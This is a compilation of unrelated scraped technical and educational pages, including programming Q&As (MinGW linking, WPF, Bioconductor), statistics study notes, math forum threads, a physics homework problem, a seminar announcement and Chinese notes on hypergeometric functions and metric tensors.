When I enter into the command line:
x86_64-w64-mingw32-c++ *.cpp -o W_Survival allegro-config --libs
It returned to me a linking error:
/usr/bin/x86_64-w64-mingw32-ld: unrecognized option '-z'
/usr/bin/x86_64-w64-mingw32-ld: use the --help option for usage information
collect2: ld returned 1 exit status
The compiling is all the same as I would do it using g++. the only thing different is that I have it set to compile for windows.
Is there anything that I did wrong? All help is appreciated :)
• did you correctly link against a 64-bit mingw version of the allegro libs? – tubberd Feb 12 '16 at 15:33
• Oh my, that did the trick! After I put the 64-bit version in it all worked properly! Thanks! – PlatyPi Feb 13 '16 at 19:29
• Ill add that ad an answet then :D – tubberd Feb 14 '16 at 14:40
• do you mind accepting this as the answer? for one, this will help people who have the same or similar problems. – tubberd Feb 15 '16 at 1:07
|
Study Guides (248,403)
Final
# Statistical Sciences 1024A/B Final: Vocabulary/Definitions Premium
19 Pages
33 Views
School
Department
Statistical Sciences
Course
Statistical Sciences 1024A/B
Professor
Sohail Khan
Semester
Summer
Description
Module One: Sampling Population: the whole group of individuals Sample: part of population we collect information from Unit: individuals Parameter: characteristics of the population we want to learn about Statistic: the sample version of a parameter Variable: a characteristic of an individual Sampling Design: describes exactly how to choose a sample from the population Census: information of entire population (no sample) Bias: errors in way the sample represents the population Undercoverage: occurs when groups are left out Nonresponse: when individuals can’t be contacted or won’t participate Response Bias: behaviour of the respondent or interviewer alters answers Voluntary Response Sample: people who chose themselves by responding to a broad appeal- biased Convenience Sample: takes members of the population that are easiest to reach- unrepresentative Random Sampling: uses chance to select a sample Simple Random Sample (SRS): every individual has the same likelihood of being selected Stratified Radom Sample: group into strata then have a SRS in each sample Cluster Sample: grouping people and using an entire group or multiple groups but not others as the sample Multistage Sample: Ex. random sample of telephone exchanges stratified by region, SRS of telephone #s and a random adult from each Module Two: Study Design Observational Study: variables are observed/measured and recorded- does nothing to influence Confounding: when effects of variables can’t be distinguished from each other Response Variable: a particular quantity that we ask a question about Explanatory Variable/Factor: a factor that influences the response variable Experiment: individuals are influenced and then observed Levels: Treatment: a specific experimental condition applied to individuals Randomization: use chance to assign treatments Replication: Control: control effects of variables Completely Randomized Design: all subjects are allocated at random among all the treatments- can compare any number of treatments Randomized Block Design: the random assignment of individuals to treatments is done by block Block: a group of individuals known to be similar before the experiment Placebo: Dummy treatment Blinding: Don’t know which treatment is being received. Double Blind: the subjects and the people who interact with them don’t know which treatment they’re receiving. Statistical Significance: an effect so large it couldn’t be observed by chance Matched Pairs Design: Closely matched pairs are given different treatments to compare Module Three: Descriptive Stats- One Variable (Qualitative) Categorical Variable: places an individual in categories- not meaningful numbers Pie chart: shows the distribution of the categorical variable as a “pie”- use when you want to emphasize each category’s relation to the whole Bar graph: represents each category as a bar- show category counts or percents- more flexible than pie charts Quantitative variables and data: deal with units of measurement- numerical values for which averaging makes sense Continuous: continues Discrete: finite numbers Histogram: most common graph of the distribution of one quantitative variable- percent is at the bottom unlike a bar graph Stemplot: for small data sets Boxplot: data represented as a box Frequency: Total number Relative frequency: Measures of centre: Mean: average of n values Median: value that divides the dataset in half Measures of position- quartiles: 25% and 75%- median of median Measures of spread: Range: maximum-minimum Interquartile range: Q3-Q1 Variance: typical squared deviation between the observations and their mean Standard deviation: square root of sample variance Symmetry: left and right side of histogram approximately mirror each other Skewness: one side extends farther than the other Outliers: individual that falls outside the overall pattern Five number summary: Min Q1 Med Q3 Max Module Four: Descriptive Stats: Two Variables Side-by-side boxplots: provide visual comparison for the distribution of a quantitative variable across a qualitative one Two-way table: two qualitative variables- each cell represents the count of individuals or units that have a particular combination of characteristics Marginal distribution: provides information about the distribution of one qualitative variable but does not provide any information about an association between variables- focuses on one row, and the column of totals (the margin) Conditional distribution: the distribution of a variable for a specific value of the other- summarizes its distribution for specific values of the other variables Simpson’s paradox: an association holds consistently for all groups, but then when the data is considered together the direction of association is reversed due to a lurking variable Scatterplot: visual of the association between two quantitative variable the have been measured on the same units or individuals Time plot: measures intervals over time Trend: positive or negative if the data shows a consistent upward or downward tendency over time Cycle: when the data shows regular up and down fluctuations over time Change points: changes in the overall pattern-striking deviations- suggest something happened around the time of change that impacted the variable Module Five: Linear Relationships Correlation: association Causation: one variable causes another, NOT ALWAYS THE CASE Explanatory (x) variable: causes outcome of interest Response (y) variable: outcome of interest Least-squares regression: minimizes the vertical distance between each square and the line Ecological correlation: correlations between the average values for x and y- tend to be higher than correlations based on x and y Influential point or observation: outliers, if the point was not there the results would be dramatically different Extrapolation: don’t use what you have in one chart to predict the correlation of something outside the chart (if you know BAC vs. # of beers for 1-9 don’t guess about 12 or 20 because it could be different) Lurking variable: another variable Predicted (or fitted) value: line of regression Coefficient of determination: the proportion or fraction of total variation in y that is explained by the least squares regression line- the square of the correlation- COD= explained variation/explained + unexplained variation Residual: observed-predicted values (actual point and line) Residual plot: x is the same, y is residuals Module Six: Quantifying Uncertainty Randomness: a property of a phenomenon whose outcomes cannot be predicted in short run but that behaves in a certain way in the long run Experiment: a process for which a single outcome occurs but in which there are more than one possible outcomes. Thus, we are uncertain which outcome will occur and cannot predict this outcome in advance. Sample space: The sample space, denoted by S, of an experiment is the set of all possible outcomes of the experiment. Let us consider sample space for an experiment when we toss three coins: S = {HHH, HHT, HTH, THH, HTT, THT, TTH, TTT}. Simple event and event: An event A is a subset of the sample space S. It is a set containing a subset of the outcomes of a particular interest. In roll of a die ("die" is the singular form of "dice"), our interest might be if die showed an even number. This event will have 3 outcomes. Each outcome is called a simple event. Venn diagram: used to represent samples spaces and events Rules of Probability: Conditional probability: Disjoint (i.e., mutually exclusive) events: events which cannot occur together. In other words, one stops the occurrence of the other Independent events: Independence implies that occurrence of one event does not affect the occurrence (or non- occurrence) of the other event. Two-way tables and probability trees: Random variable: variable which takes numerical values corresponding to outcomes of a random phenomenon Probability distribution: a rule, formula or function which tells us which values the random variable can take on and provides us a method to assign probabilities to these values of the random variable. Discrete probability models: probabilities associated with fixed outcomes in a sample space Continuous probability models: describes the pattern of a random phenomenon using a density curve Module Seven: Variables and Distributions Random variables: a variable which takes numerical values corresponding to outcomes of a random phenomenon Histograms: summarize observed quantitative data. Density curves are often used to model (or describe) results of random phenomena. For the theory (i.e., the model) to coincide with the data, then, the histogram and the density curve should be similar. Density curves: A density curve describes the theoretical pattern or distribution of a random variable and this description is in terms of a mathematical function. A density curve always sits on or above the horizontal axis and has an area of exactly 1 underneath it. The area under the curve for a given range of values is the probability that the random variable takes on values in that range. We often use density curves to model (or describe) results of random phenomena. Probability distributions: a rule, formula or function that tells us which values a random variable can take on and provides us a method to assign probabilities to the values of the random variable Skewness: one side is more spread out than the other- positive/to the right if mean>median Symmetry: no skewness Normal distribution: Normal distributions are defined by two parameters (mean and standard deviation). The mean $$\mu$$ of the distribution determines where the curve is centered and the standard deviation (SD), $$\sigma$$, determines how spread out the distribution is. All normal distributions have the same shape - they are symmetric and bell-shaped 68%-95%-99.7%/ Empirical Rule: It states that if your distribution is bell-shaped and symmetrical then you can expect about 68% of the observations (data) within one standard deviation of the mean ($$\mu$$ ± $$\sigma$$), about 95% of the observations within two standard deviation of the mean ($$\mu$$ ± 2$$\sigma$$) and almost all (about 99.7%) of the observations within three standard deviation of the mean ($$\mu$$ ± 3$$\sigma$$). These percentages are properties of normal distributions. Standard normal distribution: Uniform/Rectangular distribution: The continuous uniform distribution or rectangular distribution is a symmetric probability distribution. A uniformly distributed random variable takes values which are equally probable. Thus, the height of the rectangle for all values of the random variable is constant. Suppose, we like to define a uniform probability distribution over an interval “a” and “b”. The density curve of this uniform random variable will look like: Triangular distribution: The triangular distribution is a symmetric probability distribution. As the name suggests, the shape of the density curve for the rectangular distribution looks like a triangle. To solve problems about a triangular distribution, the key is to sketch the curve and use the formula for area of a triangle to find the required probabilities. Module 8: Sampling Distributions Parameter: characteristics of the population we want to learn about Statistic: the sample version of the parameter Sampling variability or sampling error: not a mistake, it’s a natural consequence of sampling- the difference between the statistic and the parameter it estimates- doesn’t quite represent the whole because the sample is very small- when you take the same sample size with different units you will get a different statistic- this is sampling variability Law of Large Numbers: as the number of observations randomly chosen from a population with finite mean (\mu\) increases, the mean of the observations (\bar{x}\) gets closer and closer to the mean of the population Population Distribution: summarizes the variable values for the whole population Sampling Distribution: summarizes the variable values for the whole sample Central Limit Theorem: when n is large, the sampling distribution of x-bar will be approximately normally distributed with mean mu and standard deviation sigma/ square root n. Sampling Distribution of the sample mean: summarizes the values that the sample mean takes on across all the possible SRS’s of the same size from the population Sampling Distribution of the sample proportion: summarizes the values that the sample proportion takes on across all the possible SRS’s of the same size from the population • A few conclusions about the Sampling Distribution of $$\bar{X}$$ in general: In summary, knowing how $$\bar{X}$$ varies from sample to sample provides some insight into how well an $$\bar{x}$$ from a sample will estimate $$\mu$$ which will help us with
More Less
Related notes for Statistical Sciences 1024A/B
Me
OR
Join OneClass
Access over 10 million pages of study
documents for 1.3 million courses.
Join to view
OR
By registering, I agree to the Terms and Privacy Policies
Just a few more details
So we can recommend you notes for your school.
|
# 1012.u Calculate e
## Problem
Problem Description
A simple mathematical formula for e is where n is
allowed to go to infinity.
This can actually yield very accurate approximations of e using relatively small values of n.
Output
Output the approximations of e generated by the above formula for the values of n from 0 to 9. The beginning of your output should appear similar to that shown below.
Sample Output
n e
- ———–
0 1
1 2
2 2.5
3 2.666666667
4 2.708333333
## Solution
#include<stdio.h>
int main(void)
{
double ji,sum;
int i,j,k;
printf("n e\n");
printf("- -----------\n");
for(i=0;i<=9;i++){
sum=0;
for(j=0;j<=i;j++){
ji=1;
for(k=1;k<=j;k++){
ji=ji*1/k;
}
sum=sum+ji;
}
if(i<=1){
printf("%d %.0f\n",i,sum);
}
else if(i==2){
printf("%d %.1f\n",i,sum);
}
else{
printf("%d %.9f\n",i,sum);
}
}
return 0;
}
|
A conversation in school
Andrei decides to do some random computation in his mind. He starts out with the number $x$. First, he multiplies his number by $3$. Then, he squares his new number. Lastly, he subtracts $8$ times the square of his original number from the new number. His final result is the units digit of $3^{2016}+2(25^{1000})$. When Kostya tries to figure out the original number, he discovers that there are multiple answers. Andrei then tells Kostya that his starting number was his date of birth (Kostya did not know it). What number did Andrei start with?
×
|
In search for isotropic graphs: Straight lines and parallels - MathOverflow most recent 30 from http://mathoverflow.net 2013-05-26T00:36:54Z http://mathoverflow.net/feeds/question/46930 http://www.creativecommons.org/licenses/by-nc/2.5/rdf http://mathoverflow.net/questions/46930/in-search-for-isotropic-graphs-straight-lines-and-parallels In search for isotropic graphs: Straight lines and parallels Hans Stricker 2010-11-22T10:48:18Z 2010-11-22T14:23:16Z <p>I wonder why I can find only so little attempts of concisely defining "directions" and "isotropy" of graphs.</p> <p>In Euclidean spaces "directions" can be identified with equivalence classes of parallel straight lines. And on directions definitions of "isotropy" and "anisotropy" normally rely.</p> <p>I believe it's easy to define a "straight line" in a graph: </p> <p><strong>Definition 1:</strong> Let <em>$x$ be straightly connected to $y$</em> iff there is a unique (!) shortest path between vertices $x$ and $y$ of finite length. A <em>straight line</em> then is a maximal set of pairwise straightly connected vertices.</p> <p>Before I go to try to define parallelity I want to temporarily restrict the examination to infinite planar graphs whose faces tile the plane (<em>planar tiling graphs</em> for short) because these are the graphs I have in mind, finally. By doing so a straight line is additionally assumed to be infinite.</p> <p>Parallelity cannot be defined so unambiguously. Two definitions come to mind:</p> <p><strong>Definition 2.1:</strong> Let <em>two straight lines</em> $l_1$ <em>and</em> $l_2$ <em>be weakly parallel</em> iff they have no vertex in common. </p> <p>(This definition will definitely only make sense for planar graphs.)</p> <p><strong>Definition 2.2:</strong> Let <em>two straight lines</em> $l_1$ <em>and</em> $l_2$ <em>be strongly parallel</em> iff there is a bijection $\pi$ from $l_1$ to $l_2$, such that $x$ and $\pi(x)$ have equal distance for all $x \in l_1$.</p> <p>A litmus test for a good definition of "straight lines" and "parallels" might be whether a planar (tiling) graph can always be drawn such that straight graph lines are mapped on straight geometric lines and parallel graph lines on parallel geometric lines.</p> <blockquote> <p><strong>Question 1:</strong> Can be seen at a glance whether the definitions above pass this litmus test?</p> <p><strong>Question 2:</strong> Are there known equivalent definitions (with different terminology only)?</p> <p><strong>Question 3:</strong> Are there known <em>other</em> definitions in the same spirit? </p> <p><strong>Question 4:</strong> Are there interesting results involving such definitions and maybe regularity and/or symmetry? </p> </blockquote> http://mathoverflow.net/questions/46930/in-search-for-isotropic-graphs-straight-lines-and-parallels/46946#46946 Answer by Joseph O'Rourke for In search for isotropic graphs: Straight lines and parallels Joseph O'Rourke 2010-11-22T13:09:07Z 2010-11-22T13:09:07Z <p>Perhaps it will help to explore the world of <em>pseudoline arrangements</em>. A <em>pseudoline</em> is a simple curve in the projective plane that is topologically a line. Each pair of pseudoines in an arrangment meet at most once. The analog of "every two points determine a line" is the the <em>Levi Enlargement Lemma</em>: For every two distinct points not on the same pseudoline in an arrangement, there is a pseudoline passing through those two points that enlarges the arrangement. The natural graphs associated with pseuodline arrangements have been studied. I believe they correspond to your "infinite planar graphs whose faces tile the plane."</p> <p>Although pseudolines are mentioned in <a href="http://en.wikipedia.org/wiki/Arrangement_of_lines" rel="nofollow">this Wikipedia article</a>, a more definitive exposition can be found in the article by Jacob E. Goodman "Pseudoline arrangments," Chapter 5 in the <em><a href="http://cs.smith.edu/~orourke/books/discrete.html" rel="nofollow">Handbook of Discrete and Computational Geometry</a></em> (CRC, 2004). Another good source is the paper by Pankaj Agarwal and Micha Sharir, "<a href="http://portal.acm.org/citation.cfm?id=545381.545486" rel="nofollow">Pseudo-line arrangements: duality, algorithms, and applications</a>" <em>Proceedings of the 13th ACM-SIAM Symposium on Discrete Algorithms</em>, 2002.</p>
|
# Geometry - Area of Siamese Triangles
How can I find the Area of this figure?
It is quite curious because it is a particular case of this sequence:
Anyone know how to find the area of this sequence as a function of the number of segments?
-
Suppose you are looking at the shape given by the lines $L_{x,y}$ linking $(x,0)$ to $(0,y)$ when $x+y=n$ (your examples are $n=3$ and $n=8$). For $0\le k < n$, call $(x_k,y_k)$ the intersection of $L_{n-k,k}$ with $L_{n-k-1,k+1}$. A few calculations show that $(x_k,y_k) = (\frac{(n-k)(n-k-1)}n,\frac {k(k+1)}n)$
Then, decompose your shape in $n-1$ triangles of base $1$ and height $y_k$ : The total area is then $\frac 1 2 \sum_{k=1}^{n-1} \frac {k(k+1)}n = \frac {(n+1)n(n-1)}{6n} = \frac{n^2-1}6$
-
Write the points as Cartesian coordinates. So $O=(0,0)$, $A=(0,2k)$, $B=(2k,0)$, and $D$, the point where the the two hypotenuses meet (solving two equations $2y+x = 2k$ and $y+2x=2k$) is $(\frac{2k}{3},\frac{2k}{3})$.
The two triangles, $ODA$ and $ODB$ are congruent, so the total area is twice the area of $ODA$. But that's just the area of the parallelogram, $O,D,A,D+A$, which, if you remember your linear algebra, is just the determinant, $\frac{2k}{3}2k - \frac{2k}{3}0 = \frac{4k^2}{3}$
The more general solution is $n(n+2)/6$ where $n=2$ in your first example, and $n=7$ in your second.
|
A community for students. Sign up today
Here's the question you clicked on:
anonymous 4 years ago Evaluating an integral something like:
• This Question is Closed
1. anonymous
as long as f(x) is continuous and differentiable, $\int\limits_{- \infty}^{\infty}f(x)dx$ is there ever a time we woukd not choose 0 as c in$\int\limits_{- \infty}^{c} f(x) dx + \int\limits_{c}^{\infty} f(x) dx$
2. anonymous
It's possible that a function is not differentiable at multiple points. Then you would continue to break it up like you've show above and take the limit wherever it is discontinuous.
3. lgbasallote
improper integrals huh
4. anonymous
OK, thanks, that's what I was thinking!
5. lgbasallote
you can choose 1 as c or whatever...as long it's within -infinity and +infinity
Ask your own question
Sign Up
Find more explanations on OpenStudy
Privacy Policy
|
Accelerator Seminar
# Stephan Reimann, "Re-Commissioning Strategy for GSI after the major Shutdown"
Thursday, November 9, 2017 from to (Europe/Berlin)
at KBW ( Lecture Hall )
Description In July 2016 started the longest shutdown period in GSI-history. Besides the extensive maintenance and upgrade measures, the main work package is the civil construction project GAF (GSI Anbindung an FAIR, Link of GSI to FAIR) which comprises additional shielding of SIS18, fire protection measures, as well as the connection of the new beam line between FAIR and the existing GSI facility. At the UNILAC the modernization of the post stripper RF system and the refurbishment of the HVAC system (Heating, Ventilation and Air Conditioning) have been started. In addition to these measures, the complete control system stack for SIS18, ESR and the HEST will be replaced by the FAIR system. Presently all accelerators are far from being operational (except the Cryring). Nevertheless we decided to provide a comprehensive user beam time already in 2018. During the shutdown we follow a detailed and ambitious schedule to bring our accelerator facility back online in time. The challenges and our re-commissioning strategy will be presented in this talk. Material:
|
# Is there a name for this function?
this should be simple
A polynomial could be defined as $$P_n (x) = \sum_{i=1}^{n} a_i x^{i-1}$$
Would the infinite-dimensional version of that $$F_l (x) = \int_{0}^{l} a(y) x^y dy$$ already have some name that everybody else than me already knows?
-
Your function is not really a generalization of a polynomial since the exponent is not a natural number; a better generalization might be $\sum_{n=0}^\infty a_nx^n$ which is the very-well known and important concept of power series. – Gadi A May 5 '11 at 9:04 Well it is not polynomial as it is not a polynomial that's true. But I think there is certain similarity. – etorri May 5 '11 at 9:31 Indeed; I just wanted to point out another, maybe more "in the spirit of polynomials" possible generalization. – Gadi A May 5 '11 at 10:23 You may have a look at the Mellin transform and its inverse: en.wikipedia.org/wiki/Mellin_transform – Dirk May 5 '11 at 11:42
With the substitution $x=e^{i\omega}$ is is known as Fourier-transform.
Or the substitution $x = e^{-s}$, with $l = \infty$ gives the Laplace transform... – sos440 May 5 '11 at 9:34 Yes, like the polynomial would be discrete Fourier transfom or spectral decomposition. – etorri May 5 '11 at 9:38
|
View Single Post
Sci Advisor HW Helper P: 4,301 Maybe you need to re-assign the result to the list: LM = Append[LM, m] (If this solves the problem, don't feel bad... you don't want to know how many hours I spent looking for similar mistakes) Also, if the whole body of your module is a single If-statement, what do you need the module for? You can just as well write For[..., ..., LM = Append[LM, If[...]]] instead of For[..., ..., Module[m = If[...]; LM = Append[LM, m]]
|
# Calculate how long it will take for the ice to melt?
1. Sep 19, 2011
### klilly
Calculate how long it will take for the ice to melt??
1. The problem statement, all variables and given/known data
A chilly bin has walls 5.90 cm thick and the total area of the walls is 0.700 m2. The chilly bin is loaded with 2.00 kg of ice at 0.00 °C and stood on a rack so that its entire surface is in contact with the air. The temperature on the outside of the chilly bin is 28.0 °C. If the chilly bin is made of styrofoam (kstyrofoam = 0.0100 J s–1 m–1 °C–1), how many hours will it take to melt all of the ice?
(Note: Lfwater = 3.35 × 105 J kg–1)
2. Relevant equations
I was given (L (water) x m (water))/ kA(Change in T/Change in thickness)
But it didnt work out right
3. The attempt at a solution
I have no idea how to get to this :(
2. Sep 19, 2011
### issacnewton
Re: Calculate how long it will take for the ice to melt??
law of thermal conduction says
$$\mathcal{P}=kA\;\frac{\Delta T}{\Delta x}$$
where P is the power transferred, k is thermal conductivity, A is the area of the surface through which energy will flow, $\frac{\Delta T}{\Delta x}$ is temperature gradient.
$\Delta T$ is the temperature difference between inner and outer surface,
$\Delta x$ is the thickness of the bin.
now we have been given , for chilly bin (made out of styrofoam)
k= 0.0100 J s-1 m-1 °C-1
A=0.700 m2
delta T=28-0=28 °C
delta x=5.92 x 10-2 m
using this you can find the power which transfers from the outside to inside where ice is
stored. P= 3.322 J s-1=3.322 W
now amount of energy required to melt m kg of ice is
$$Q=m_{ice}L_f$$
mice=2 kg ; Lf=3.35 × 105 J kg-1
so we get Q= 6.7 x 105 J
if t is the time required to melt all ice then Q must be equal to P x t . solve for t. its 56 hrs
|
# Loading page in WPF
Guys, I have a basic WPF application. Contains App.xaml as always and a Mainwindow.xaml. I've created also some pages like page1/2/3. I want to load for example page1.xaml in mainwindow.xaml. Is this possible? And also want to close it so the content of mainwindow.xaml will stay in there.
I dont want this to be a navigation application with the left/right arrows at the top.
-
## 3 Answers
You can add a frame to your main page and load the pages on it.
-
I came here to add that there are many ways to load the pages into the frame:
By setting the source (as @Shift mentioned)
frame1.Source = new Uri("Page1.xaml", UriKind.RelativeOrAbsolute);
By setting the Content:
frame1.Content= new Page1();
By using the NavigationService:
frame1.NavigationService.Navigate(new Page1());
-
Adding a frame and setting the source for the frame like makes my day :)
frame1.Source = new Uri("Page1.xaml", UriKind.RelativeOrAbsolute);
-
|
Example Method of Least Squares
The given example explains how to find the equation of a straight line or a least square line by using the method of least square, which is very useful in statistics as well as in mathematics.
Example:
Fit a least square line for the following data. Also find the trend values and show that $\sum \left( {Y – \widehat Y} \right) = 0$.
$X$ 1 2 3 4 5 $Y$ 2 5 3 8 7
Solution:
$X$ $Y$ $XY$ ${X^2}$ $\widehat Y = 1.1 + 1.3X$ $Y – \widehat Y$ 1 2 2 1 2.4 -0.4 2 5 10 4 3.7 +1.3 3 3 9 9 5.0 -2 4 8 32 16 6.3 1.7 5 7 35 25 7.6 -0.6 $\sum X = 15$ $\sum Y = 25$ $\sum XY = 88$ $\sum {X^2} = 55$ Trend Values $\sum \left( {Y – \widehat Y} \right) = 0$
The equation of least square line $Y = a + bX$
Normal equation for ‘a $\sum Y = na + b\sum X{\text{ }}25 = 5a + 15b$ —- (1)
Normal equation for ‘b $\sum XY = a\sum X + b\sum {X^2}{\text{ }}88 = 15a + 55b$ —-(2)
Eliminate $a$ from equation (1) and (2), multiply equation (2) by 3 and subtract from equation (2). Thus we get the values of $a$ and $b$.
Here $a = 1.1$ and $b = 1.3$, the equation of least square line becomes $Y = 1.1 + 1.3X$.
For the trends values, put the values of $X$ in the above equation (see column 4 in the table above).
|
Search
Question: Error in columns(org.Hs.eg.db) : could not find function "columns"
0
9 months ago by
Sanches0
Sanches0 wrote:
Hi all,
I have been running an analysis from microarray data and when I try to run this line " columns(org.Hs.eg.db)", I get an error. Could anyone please help me to understand this problem?
source("https://bioconductor.org/biocLite.R")
install.packages("org.Hs.eg.db", repos="http://bioconductor.org/packages/3.1/data/annotation")
biocLite("org.Hs.eg.db")
biocLite("hgu95av2.db")
biocLite("tidyverse")
columns(org.Hs.eg.db)
keytypes(org.Hs.eg.db)
modified 9 months ago by James W. MacDonald46k • written 9 months ago by Sanches0
1
2
9 months ago by
United States
James W. MacDonald46k wrote:
There are two problems here. First, don't do this:
install.packages("org.Hs.eg.db", repos="http://bioconductor.org/packages/3.1/data/annotation")
The whole idea behind biocLite is that you don't need to figure out what repository to use, particularly since Bioconductor package versions are specific to a given R version. By hijacking the process like that you are taking the chance that you will install the wrong thing.
Second, you have to load a package before you can use it.
> columns(org.Hs.eg.db)
Error in columns(org.Hs.eg.db) : could not find function "columns"
> library(org.Hs.eg.db)
<snip>
> columns(org.Hs.eg.db)
[1] "ACCNUM" "ALIAS" "ENSEMBL" "ENSEMBLPROT" "ENSEMBLTRANS"
[6] "ENTREZID" "ENZYME" "EVIDENCE" "EVIDENCEALL" "GENENAME"
[11] "GO" "GOALL" "IPI" "MAP" "OMIM"
[16] "ONTOLOGY" "ONTOLOGYALL" "PATH" "PFAM" "PMID"
[21] "PROSITE" "REFSEQ" "SYMBOL" "UCSCKG" "UNIGENE"
[26] "UNIPROT"
Hi James,
I have found out the problem. Everything went well when I loaded the biomaR package.
Thanks
|
# Constructing a family of convergents from continued fractions formed by a set of prime partial quotients
For a given real number $x$, the continued fraction representation $x = [a_0; a_1, a_2, \cdots]$ where $(a_n)_{n \geq 0}$is defined by setting $x = \alpha_0$, then $a_i = \lfloor \alpha_i \rfloor$, and $\alpha_{i+1} = \frac{1}{\alpha_i - a_i}$ for $i \geq 0$. A convergent of $x$ is a rational number $p_n/q_n$ where $p_n/q_n = [a_0; a_1, \cdots, a_n]$, and $\gcd(p_n, q_n) = 1$.
My question is as follows. Is there a set $\mathcal{A} \subset \mathcal{P}$, where $\mathcal{P}$ denotes the set of prime numbers, and the set of $\mathfrak{C}_\mathcal{A}$ real numbers $x \in [0,1]$ with $x = [0; a_1, a_2, \cdots]$ such that $a_i \in \mathcal{A}$ for all $i \geq 1$, with the property that there exist infinitely many pairs of primes $p < q$ such that $p/q$ is a convergent for some element $x \in \mathfrak{C}_\mathcal{A}$?
The question is of interest because of the following 'additive' property of continued fractions:
$$\displaystyle \frac{1}{a + \frac{b}{d}} = \frac{d}{b + ad}$$
which implies that if $p/q$ is a convergent in $\mathfrak{C}_\mathcal{A}$ then so is $q/(p + aq)$. This is interesting because Zaremba's conjecture asserts that for a finite set of the form $\mathcal{B} = \{1, 2, \cdots, B\}$ with $B \geq 5$, the set of denominators $\mathfrak{D}_\mathcal{B}$ of those $d$ that appears as the denominator of a fraction $b/d$ which is the convergent of some number $z$ whose partial quotients all line $\mathcal{B}$ should be all but finitely many positive integers. If this hypothesis can be relaxed to a set of primes, then one can show that almost all positive integers can be written as the sum $p + aq$ where $a$ is from a finite family of primes which would greatly strengthen Chen's theorem and be ever so close to the vaunted Goldbach conjecture.
## 1 Answer
This is only half an answer. For almost all real $x$ we have an asymptotic formula for convergents with prime denominators, see Bykovskii, On the distribution of prime denominators of the approximants for almost all real numbers. Probably we should sieve one more time.
|
# Changes between Version 4 and Version 5 of udg/ecoms/RPackage/examples/continentalSelection
Ignore:
Timestamp:
Feb 20, 2014 3:10:57 PM (8 years ago)
Comment:
--
### Legend:
Unmodified
v4 = Alternative visualization tools: Monsoon in the Indian subcontinent So far we have shown plotting examples using the trellis plots generated by the spplot method. In this examples we show alternative plotting options using more standard R plotting functions for gridded data. To this aim, we load the precipitation data of 1997 for the lead month 1 forecast over the Indian subcontinent, considering the monsoon season from June to September: So far we have shown plotting examples using the trellis plots generated by the spplot method. In this examples we show alternative plotting options using more standard R plotting functions for gridded data. To this aim, we load the precipitation data of 1997 for the lead month 1 forecast over the Indian subcontinent, considering the monsoon season from June to September: {{{ [[Image(contour.png)]] == filled.contour function Filled contour produces a nice output with a graduated colorbar, but placing lines or other elements on the plot is not straightforward... [[Image(filled_contour.png)]]
|
## 知识:合流超几何函数(Hypergeometric)
Mathematica 中一共有多种合流超几何函数(Hypergeometric),分别如下:
## Metric Tensor[转载]
Roughly speaking, the metric tensor is a function which tells how to compute the distance between any two points in a given space. Its components can be viewed as multiplication factors which must be placed in front of the differential displacements in a generalized Pythagorean theorem:
(1)
In Euclidean space, where is the Kronecker delta (which is 0 for and 1 for ), reproducing the usual form of the Pythagorean theorem
(2)
In this way, the metric tensor can be thought of as a tool by which geometrical characteristics of a space can be “arithmetized” by way of introducing a sort of generalized coordinate system (Borisenko and Tarapov 1979).
In the above simplification, the space in question is most often a smooth manifold , whereby a metric tensor is essentially a geometrical object taking two vector inputs and calculating either the squared length of a single vector or a scalar product of two different vectors (Misner et al. 1978). In this analogy, the inputs in question are most commonly tangent vectors lying in the tangent space for some point, a fact which facilitates the more common definition of metric tensor as an assignment of differentiable inner products to the collection of all tangent spaces of a differentiable manifold (O’Neill 1967). For this reason, some literature defines a metric tensor on a differentiable manifold to be nothing more than a symmetric non-degenerate bilinear form (Dodson and Poston 1991).
An equivalent definition can be stated using the language of tensor fields and indices thereon. Along these lines, some literature defines a metric tensor to be a symmetric tensor field on a smooth manifold so that, for all , is non-degenerate and for some nonnegative integer (Sachs and Wu 1977). Here, is called the index of and the expression refers to the index of the respective quadratic form. This definition seems to occur less commonly than those stated above.
Metric tensors have a number of synonyms across the literature. In particular, metric tensors are sometimes called fundamental tensors (Fleisch 2012) or geometric structures (O’Neill 1967). Manifolds endowed with metric tensors are sometimes called geometric manifolds (O’Neill 1967), while a pair consisting of a real vector space and a metric tensor is called a metric vector space (Dodson and Poston 1991). Symbolically, metric tensors are most often denoted by or , although the notations (O’Neill 1967), (Fleisch 2012), and (Dodson and Poston 1991) are also sometimes used.
When defined as a differentiable inner product of every tangent space of a differentiable manifold , the inner product associated to a metric tensor is most often assumed to be symmetric, non-degenerate, and bilinear, i.e., it is most often assumed to take two vectors as arguments and to produce a real number such that
(3)
(4)
(5)
(6)
Note, however, that the inner product need not be positive definite, i.e., the condition
(7)
with equality if and only if need not always be satisfied. When the metric tensor is positive definite, it is called a Riemannian metric or, more precisely, a weak Riemannian metric; otherwise, it is called non-Riemannian, (weak) pseudo-Riemannian, or semi-Riemannian, though the latter two terms are sometimes used differently in different contexts. The simplest example of a Riemannian metric is the Euclidean metric discussed above; the simplest example of a non-Riemannian metric is the Minkowski metric of special relativity, the four-dimensional version of the more general metric of signature which induces the standard Lorentzian Inner Product on -dimensional Lorentzian space. In some literature, the condition of non-degeneracy is varied to include either weak or strong non-degeneracy (Marsden et al. 2002); one may also consider metric tensors whose associated quadratic forms fail to be symmetric, though this is far less common.
In coordinate notation (with respect to a chosen basis), the metric tensor and its inverse satisfy a number of fundamental identities, e.g.
(8)
(9)
and
(10)
where is the matrix of metric coefficients. One example of identity (0) comes from special relativity where is the matrix of metric coefficients for the Minkowski metric of signature , i.e.
(11)
Generally speaking, identities (3), (2), and (1) can be succinctly written as
(12)
where
(13) (14)
What’s more,
(15)
gives
(16)
and hence yields a quantitative relationship between a metric tensor and its inverse.
In the event that the metric is positive definite, the metric discriminants are positive. For a metric in two-space, this fact can be expressed quantitatively by the inequality
(17)
The orthogonality of contravariant and covariant metrics stipulated by
(18)
for gives linear equations relating the quantities and . Therefore, if metrics are known, the others can be determined, a fact summarized by saying that the existence of metric tensors gives a geometrical way of changing from contravariant tensors to covariant ones and vice versa (Dodson and Poston 1991).
In two-space,
(19) (20) (21)
Therefore, if is symmetric,
(22) (23)
In any symmetric space (e.g., in Euclidean space),
(24)
and so
(25)
The angle between two parametric curves is given by
(26)
so
(27)
and
(28)
In arbitrary (finite) dimension, the line element can be written
(29)
where Einstein summation has been used. In three dimensions, this yields
(30)
and so it follows that the metric tensor in three-space can be written as
(31)
Moreover, because for when working with respect to orthogonal coordinate systems, the line elementfor three-space becomes
(32) (33)
where are called the scale factors. Many of these notions can be generalized to higher dimensions and to more general contexts.
## 计算张量的软件
